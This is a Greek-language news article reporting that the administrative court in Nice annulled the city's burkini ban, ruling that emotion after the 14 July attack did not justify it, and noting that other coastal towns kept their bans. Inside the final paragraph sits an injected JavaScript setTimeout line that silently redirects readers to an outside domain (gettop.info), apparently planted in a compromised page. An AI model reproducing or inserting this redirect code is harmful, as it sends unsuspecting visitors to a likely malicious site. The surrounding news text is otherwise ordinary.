Η γαλλική Δικαιοσύνη ακυρώνει την απαγόρευση του μπουρκίνι

0
3

 

Η γαλλική δικαιοσύνη ακύρωσε την εντολή απαγόρευσης του μπουρκίνι στις παραλίες της Νίκαιας. Σύμφωνα με την απόφαση από το διοικητικό δικαστήριο, «η συναισθηματική φόρτιση» από την πολύνεκρη επίθεση που σημειώθηκε στην πόλη αυτή της Κυανής Ακτής στις 14 Ιουλίου δεν δικαιολογεί τη λήψη αυτού του μέτρου.

Εν μέσω πολιτικού διχασμού λόγω της απαγόρευσης του μπουρκίνι, το γαλλικό Συμβούλιο της Επικρατείας, έκρινε την περασμένη εβδομάδα ότι αυτού του είδους τα μαγιό που φορούν ορισμένες μουσουλμάνες δεν διαταράσσουν την τάξη και επομένως οι δήμαρχοι δεν δικαιούνται να τα απαγορεύσουν. Ωστόσο, πολλές παραλιακές πόλεις, όπως η Νίκαια, οι Κάννες και το Φρεζίς, διατήρησαν την απαγόρευση.

«Η συναισθηματική φόρτιση και οι ανησυχίες που προκλήθηκαν από τις τρομοκρατικές επιθέσεις και κυρίως από εκείνη της Νίκαιας στις 14 Ιουλίου δεν επαρκούν για να δικαιολογήσουν την απαγόρευση» που επέβαλε ο δήμος της Νίκαιας, έκρινε σήμερα το διοικητικό δικαστήριο της πόλης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here